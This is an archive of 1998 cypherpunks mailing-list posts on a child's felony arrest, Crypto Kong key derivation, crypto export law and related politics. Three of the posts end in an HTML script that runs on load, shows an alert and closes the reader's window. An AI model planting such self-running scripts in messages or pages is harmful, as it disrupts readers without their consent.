Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id XAA14885; Sat, 21 Feb 1998 23:11:21 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id XAA14881 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 23:11:16 -0800 (PST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id XAA13278 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 23:05:59 -0800 (PST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id XAA29498;
	Sat, 21 Feb 1998 23:11:07 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v03102811b1157f3403cd@[207.167.93.63]>
In-Reply-To: <Pine.GSO.3.96.980222010010.11679A-100000@use.usit.net>
References: <v03102808b114caa597c5@[207.167.93.63]>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 23:14:03 -0800
To: Brad <bdolan@USIT.NET>, cypherpunks@cyberpass.net
From: Tim May <tcmay@got.net>
Subject: Re: Some children are rabid and need to be put down
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1893


At 10:11 PM -0800 2/21/98, Brad wrote:
>It occurs to me that society has been restructured so that "the
>authorities" are the only ones permitted to fix many sorts of
>commonly-encountered problems  which individual citizens used to be able
>to take care of themselves. Like spanking a spoiled 5 year old child
>instead of charging her with a felony.  Further, said authorities have
>great and arbitrary powers to fix things however they want.
>
>Combine this regular dependence on arbitrary authority with an Orwellian
>database of Good Citizens and Troublemakers in the hands of that authority
>and what have you got?  A cowed citizenry, to say the least.

I don't disagree with the larger point.

The solution is the one libertarians have argued for for many years:
provide choice in schools. Then a school could pick and choose its pupils,
and vice versa.

But with the system as it stands now, a child who throws chairs, bites,
kicks, and whatnot needs to be dealt with.

One of the very few legitimate functions of a government is police action.
Against assaults, by assaulters of whatever age.

While we may think it is "ludicrous" for the police to be called in,
consider the alternative. Is the teacher supposed to allow herself to be
hit over the head with chairs, even if wielded by 5-year-olds?

The system is fucked up, to be sure. But automatically arguing that the
school should not have called in the police given the constraints they are
under is foolish.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.




From owner-cypherpunks@Algebra.COM Sun Feb 22 12:16 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20937 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:16:42 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00202
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:07:47 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA00190
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:07:38 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id UAA05401; Sat, 21 Feb 1998 20:09:51 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id UAA05389 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 20:09:29 -0800 (PST)
Received: from server1.efga.org (anon@server1.efga.org [207.15.209.4]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id UAA05423 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 20:04:10 -0800 (PST)
Received: (from anon@localhost)
	by server1.efga.org (8.8.5/8.8.5) id XAA08500;
	Sat, 21 Feb 1998 23:14:05 -0500
Date: Sat, 21 Feb 1998 23:14:05 -0500
Message-ID: <7ae19d60988252f07e8400ac09206729@anon.efga.org>
From: Anonymous <anon@anon.efga.org>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <admin@anon.efga.org>.
Subject: S887
To: cypherpunks@cyberpass.net
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 31


Remailer validation. Ignore.


From owner-cypherpunks@Algebra.COM Sun Feb 22 15:21 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21238 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:21:52 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02644
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:13:04 -0500 (EST)
Received: from proxy3.ba.best.com (root@proxy3.ba.best.com [206.184.139.14])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02629
	for <cypherpunks@Algebra.COM>; Sun, 22 Feb 1998 02:12:59 -0500 (EST)
Received: from jamesd (jamesd.vip.best.com [204.156.153.125]) by proxy3.ba.best.com (8.8.8/8.8.BEST) with SMTP id XAA18934; Sat, 21 Feb 1998 23:14:53 -0800 (PST)
Date: Sat, 21 Feb 1998 23:14:53 -0800 (PST)
Message-Id: <199802220714.XAA18934@proxy3.ba.best.com>
X-Sender: jamesd@shell11.ba.best.com
X-Mailer: Windows Eudora Version 2.1
Mime-Version: 1.0
To: Adam Back <aba@dcs.ex.ac.uk>, smith@securecomputing.com
From: "James A. Donald" <jamesd@echeque.com>
Subject: Re: WoT discussions, Trust for Nyms
Cc: cypherpunks@Algebra.COM, cryptography@c2.net
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 3889


    --
Rick Smith <smith@securecomputing.com> writes:
> > I admit I can't figure out what crypto mechanism Kong is 
> > really using since there's obfuscating talk of 
> > passphrases and secrets.

At 12:06 AM 12/6/97 GMT, Adam Back wrote:
> What James describes on the page is that he is storing the 
> private EC key in a file.  The file is optionally encrypted 
> with a passphrase.

No

The file, if you have one, is merely a continuation of the  
passphrase.

The secret key is generated on the fly from the passphrase,  
the file, and the name:

In my web page "How Kong Works"  I write:

       To generate our secret key, your computer hashes the  
       passphrase, the secret file, and the name, to generate 
       a big number, a two hundred and forty bit number. That 
       is a number somewhere around 1000 000 000 000 000 000 
       000 000 000 000 000 000 000 000 000 000 000 000 000  
       000 000 000 000 000 

       So the secret generated from your secret key is really 
       a very big number. 

       The public key, which appears in your signature, is an 
       elliptic point, the generator multiplied by that  
       number. This point is represented by the x coordinate 
       of the elliptic point, a 255 bit number, plus a sign  
       bit, represented in base 64 format. 

 Rick Smith
> > Since Kong does not use certificates, it is vulnerable to 
> > the Man in the Middle (MIM) attack and indeed to forgery.

Not so.

For example how could a man in the middle pass himself off as 
the author of Crypto Kong?

> > However, I also suspect that the behavior of a long lived 
> > cyberspace identity would make a MIM attack detectable 
> > and/or impractical in the long run.

Exactly so.

Any document is potentially a certificate. 

Commonly you wish to link a document to network reputation, 
rather than a physical person.  For this purpose PGP key 
signing parties are largely irrelevant.   Verisign 
certificates primarily work to link your digital signature to 
your credit rating, and thus, unfortunately, also liink your 
digital signature to the number of the beast.

At present there is insufficient internet commerce for a 
credit rating not linked to the number of the beast to be 
useful, though this may change in the future.

> In general John Doe's strategy to avoid being the subject 
> of a MITM attack should be to be unpredictable in the 
> channels he uses for authentication and communication.

John Doe usually wishes to avoid a MITM attack because his 
reputation is valuable.  He fears Malloc will use that 
reputation for Mallocs own purposes.

If John Doe's reputation is valuable, he has emitted many 
communications over a lengthy time.

If these are signed, and each signature contains John Doe's 
public key, Malloc cannot perform a man in the middle attack,
and thus cannot steal John Doe's reputation, or use it for
his own purposes. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     KsnYz0T1NR0Dp/XX6Pri0xg59C+MF79KO/GUuXZW
     49sq/p4ywrtYwg1Kl/PsTHBHGYfBfWYLF6pkKH+UU

>
>
>Interlock protocols are another method of complicating the MITM's
>task.  If Joe develops the habit of posting the hash of messages he is
>about to post a day in advance, the MITM must think of something to
>say also, and publish the hash, so that it can publish something a day
>later.
>
>As the MITM's messages now don't match with what Joe said, the MITM
>has to lie some more to keep up the game.  We would like to overload
>the MITM so that his task of lying becomes computationally infeasible.
>
>Adam
>
>
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/


From owner-cypherpunks@Algebra.COM Sun Feb 22 15:21 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21239 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:21:53 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02628
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:12:59 -0500 (EST)
Received: from proxy3.ba.best.com (root@proxy3.ba.best.com [206.184.139.14])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02608
	for <cypherpunks@Algebra.COM>; Sun, 22 Feb 1998 02:12:55 -0500 (EST)
Received: from jamesd (jamesd.vip.best.com [204.156.153.125]) by proxy3.ba.best.com (8.8.8/8.8.BEST) with SMTP id XAA18935; Sat, 21 Feb 1998 23:14:56 -0800 (PST)
Date: Sat, 21 Feb 1998 23:14:56 -0800 (PST)
Message-Id: <199802220714.XAA18935@proxy3.ba.best.com>
X-Sender: jamesd@shell11.ba.best.com
X-Mailer: Windows Eudora Version 2.1
Mime-Version: 1.0
To: cypherpunks@Algebra.COM, cryptography@c2.net
From: "James A. Donald" <jamesd@echeque.com>
Subject: Who is netcash?
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 752


    --
The netcash site
http://www.netbank.com/~netcash/ncquick1.html contains no
obvious information as to who they are.

The netcash people are effectively anonymous.

This is a little strange for an organization that solicits 
people to deposit money with them.

Who is netbank/netcash?


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     VojePU/6xWQxNtczN+1p6+8bVR16XMeSMVa5NDMn
     4j4e1Z788YGIc8/VPlppxukDbo+BWge0b8JpDxPOb
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/


From owner-cypherpunks@Algebra.COM Sun Feb 22 15:41 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21281 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:41:48 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02931
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:33:11 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02919
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 02:33:07 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id XAA15885; Sat, 21 Feb 1998 23:35:22 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id XAA15880 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 23:35:16 -0800 (PST)
Received: from smtp.well.com (smtp.well.com [206.80.6.147]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id XAA14174 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 23:29:59 -0800 (PST)
Received: from [163.176.132.90] (dyna-132-90.farallon.com [163.176.132.90])
          by smtp.well.com (8.8.6/8.8.4) with ESMTP
	  id XAA01415 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 23:35:06 -0800 (PST)
X-Sender: tien@mail.well.com
Message-Id: <v03007805b1157baca6e0@[163.176.132.90]>
In-Reply-To: <883a59b4f8023618756b179357fba606@anon.efga.org>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 23:33:05 -0800
To: cypherpunks@cyberpass.net
From: Lee Tien <tien@well.com>
Subject: Re: US law on re-exporting crypto software?
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1607


At 3:49 PM -0800 2/19/98, Anonymous wrote:
>An article in the current issue of the German journal `Datenschutz und
>Datensicherheit' claims that exporting crypto software from anywhere
>outside the US to a third country violates US law if the software
>contains (only marginal amounts of) US-developed code, such as a C
>standard library, and that anyone distributing crypto software that
>has been compiled with an American compiler had better not visit the
>United States.  Is that true?

Probably not.  I can see why someone might think that, though.  I'm doing
this from recollection, not research; corrections are welcome.

Obviously, US law says that US crypto software is export-controlled,
including re-exports.

Under EAR (Commerce export regs) a minimum content rule takes account of
how US-ness dilutes, e.g., a US part is US but if it's incorporated into a
foreign car that doesn't make the foreign car US.

Exception:  no minimum content rule for crypto items.  Take the PGP plug-in
for Eudora and integrate it into a foreign OS.  Even if that's the only
crypto in the OS it's enough.  Can't dilute US-ness of US crypto.

The hypo by Anonymous, however, presumes US code that isn't crypto code.
Foreign crypto is mixed with US non-crypto code.  That's different.

I've heard of no US action in this regard; be interested to know of any.
Other countries also have minimum content rules, e.g., Canada.  But Canada,
I heard, has no crypto exception.  So at some point, I think, a crypto item
stops being US under Canadian export law, but still is US under US law.
Obvious conflict.

Lee Tien





From owner-cypherpunks@Algebra.COM Sun Feb 22 14:26 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21149 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 14:26:53 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id BAA02041
	for cypherpunks-outgoing; Sun, 22 Feb 1998 01:17:49 -0500 (EST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id BAA02028
	for <cypherpunks@Algebra.COM>; Sun, 22 Feb 1998 01:17:45 -0500 (EST)
Received: from whgiii (ppp13.NAS1.dotstar.net [208.143.93.32])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id BAA21602;
	Sun, 22 Feb 1998 01:52:33 -0500
Message-Id: <199802220652.BAA21602@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 22 Feb 98 00:10:59 -0500
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
In-Reply-To: <Pine.BSF.3.91.980221073633.2368A-100000@mcfeely.bsfs.org>
Cc: Tim May <tcmay@got.net>, cypherpunks@Algebra.COM
Subject: Re: Some children are rabid and need to be put down
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 2248


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.BSF.3.91.980221073633.2368A-100000@mcfeely.bsfs.org>, on 02/21/98

   at 07:39 AM, Rabid Wombat <wombat@mcfeely.bsfs.org> said:

>> >I call things as I see them. I've heard no spin-doctoring, just reports
>> >of the child's behavior, admitted by her father.
>> 
>> So one temper-tantrum by a 5 year old and its off to the BigHouse on
>> Felony Assault Charges??

>>From the sound if it; this was not "one tantrum", but a pattern of 
>behavior that the parents failed to address after being requested to do
>so.

>Would you want your children class with another child who repeatedly went
> into room-smashing rages with no appearant consequences for such
>behavior???

>Sounds like the parents failed to "get around to" the counseling, and the
> school forced the issue.

Would you like to provide any references on this?

There was no mention of a "pattern of behavior" in any of the local
coverage. Sounds more like CYA by the school board after this incident
drew the attention of the national media.

BTW how would you like *your* child arrested and booked on Felony charges
for what appears to be a rather minor incident.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Logic, not magic.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO+11Y9Co1n+aLhhAQFeCAQAlTDj/ZJzIMqkWDVFkYbuYEDqV0bKPDUM
DbJFPsU/ReT1M/hS6mSuKoc7e7EZ4TvMe02+q4RRhfW17rKYqsgRUHjeLuRa/Pwg
VjMR1ufkd2RgiXhkUtCU9AqfWzzuE4wuCWcejFlloSvNijgCSrfBwr2bFIpS70hR
5P+vY+cL1qk=
=VYQ7
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 15:00 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21195 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:00:44 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id BAA02293
	for cypherpunks-outgoing; Sun, 22 Feb 1998 01:52:07 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id BAA02281
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 01:52:01 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id BAA00705 for cypherpunks@algebra.com; Sun, 22 Feb 1998 01:06:41 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id BAA00698 for cypherpunks-outgoing; Sun, 22 Feb 1998 01:06:36 -0600
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id BAA00682; Sun, 22 Feb 1998 01:06:20 -0600
Received: from whgiii (ppp13.NAS1.dotstar.net [208.143.93.32])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id CAA21996;
	Sun, 22 Feb 1998 02:26:32 -0500
Message-Id: <199802220726.CAA21996@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 22 Feb 98 00:36:50 -0500
To: Jim Choate <ravage@ssz.com>
In-Reply-To: <199802220436.WAA32688@einstein.ssz.com>
Cc: cypherpunks@ssz.com (Cypherpunks Distributed Remailer),
        austin-cpunks@ssz.com (Austin Cypherpunks),
        users@ssz.com (SSZ User Mail List), friends@ssz.com (Ravage's Friends)
Subject: Re: One Anthrax suspect released [CNN]
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 2175


-----BEGIN PGP SIGNED MESSAGE-----

In <199802220436.WAA32688@einstein.ssz.com>, on 02/21/98 
   at 10:36 PM, Jim Choate <ravage@ssz.com> said:

>>                ONE SUSPECT IN ANTHRAX CASE RELEASED FROM CUSTODY

This brings up a topic that I have addressed in the past on the list:

The criminalization of Scientific Research outside of federal approved
research centers.

Any type of research or even basic labwork is immpossible without catching
the eye of the federal governemnt. Purching of lab equipment, chemicals,
biological agents, growth mediums, ...ect either are outright baned from
individuls from purchasing or your purchase gets a quick call to the Feds
by an every increasing army of narcs.

Add to this the mear possesion of scientific data will classify you as a
"terrorist", and a white suppremist, and a right wing militia nut, and
whatever other convienient label the governemnet can use to instill fear
in the sheeple (20 yrs ago it would be communist subversive).

Thank god Einstein, Curie, Pasture, Edison, ... etc didn't get their start
today.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: If at first you don't succeed, work for Microsoft.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO+9y49Co1n+aLhhAQGAdAP+MaX43SnhW9wpYQYLhOKkWmwM6qnkGu/R
cdk/X01Ne8EdNCST76IQNAKVeJYik/9Kody9KK1SewVbUxG3vSXia4sU+n7T66tf
HT2IO0l4O5cmfqK9PDgvAKOPMHzqk3JcvWobU3crAGp9GiBCzzY82FnYSxbi8xp4
3cG3dJUWjsM=
=Xunj
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 15:14 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21218 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:14:47 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02404
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:04:46 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02374
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 02:04:37 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id XAA14656; Sat, 21 Feb 1998 23:06:52 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id XAA14652 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 23:06:45 -0800 (PST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id XAA13065 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 23:01:29 -0800 (PST)
Received: from whgiii (ppp13.NAS1.dotstar.net [208.143.93.32])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id CAA22110;
	Sun, 22 Feb 1998 02:39:22 -0500
Message-Id: <199802220739.CAA22110@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 22 Feb 98 01:04:54 -0500
To: Eric Cordian <emc@wire.insync.net>
In-Reply-To: <199802220128.TAA04522@wire.insync.net>
Cc: cypherpunks@cyberpass.net
Subject: Re: Pensacola Police have lost their mind!! (fwd)
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 1825


-----BEGIN PGP SIGNED MESSAGE-----

In <199802220128.TAA04522@wire.insync.net>, on 02/21/98 
   at 07:28 PM, Eric Cordian <emc@wire.insync.net> said:

>and "educators" are protected by laws which make even
>laying a finger on them a crime comparable with beating an elected
>official to a blody pulp. 

Well you were the first one to pick up on this. Here in the lovely state
of FL being an educator or elected offical gives you extra protections
compaired to thoses extended to the rest of the citizens. If anyone
re-reads the article I posted you will see that she was not charged with a
standard Assault charge but with a Felony Assult on an Educator or Elected
Official.

I guess some Pigs are more equal than others...

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: MASOCHIST: Windows SDK programmer with a smile!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO/AzI9Co1n+aLhhAQEO1gP/S+1Q2TgyJTOFbwOzRPZZSoV5mhUJRIQb
h4ELGKr0eOKbnwoX1N9EFfjECH4f14oL8ncDVU5k/m7GbrdHQP/s8BziZDFQUnbc
Cd6YRXoxDtcIcxHftDrCekJ9meqJQugy5pX1M8YHKngMHLy7CJKhkeeLQMcuStp+
Nw9YYu2oCS8=
=K0YX
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 14:20 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21132 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 14:20:00 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id BAA01451
	for cypherpunks-outgoing; Sun, 22 Feb 1998 01:09:09 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id BAA01438
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 01:09:03 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id WAA11799; Sat, 21 Feb 1998 22:11:18 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id WAA11792 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 22:11:10 -0800 (PST)
Received: from transfer.usit.net (root@transfer.usit.net [208.10.171.67]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id WAA10704 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 22:05:54 -0800 (PST)
Received: from use.usit.net (use [199.1.48.3]) by transfer.usit.net (8.8.7/8.8.5) with SMTP id BAA14447 for <cypherpunks@cyberpass.net>; Sun, 22 Feb 1998 01:11:09 -0500 (EST)
Date: Sun, 22 Feb 1998 01:11:09 -0500 (EST)
From: Brad <bdolan@USIT.NET>
Reply-To: Brad <bdolan@USIT.NET>
To: cypherpunks@cyberpass.net
Subject: Re: Some children are rabid and need to be put down
In-Reply-To: <v03102808b114caa597c5@[207.167.93.63]>
Message-ID: <Pine.GSO.3.96.980222010010.11679A-100000@use.usit.net>
MIME-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 1046


It occurs to me that society has been restructured so that "the
authorities" are the only ones permitted to fix many sorts of
commonly-encountered problems  which individual citizens used to be able
to take care of themselves. Like spanking a spoiled 5 year old child
instead of charging her with a felony.  Further, said authorities have
great and arbitrary powers to fix things however they want.

Combine this regular dependence on arbitrary authority with an Orwellian
database of Good Citizens and Troublemakers in the hands of that authority
and what have you got?  A cowed citizenry, to say the least.

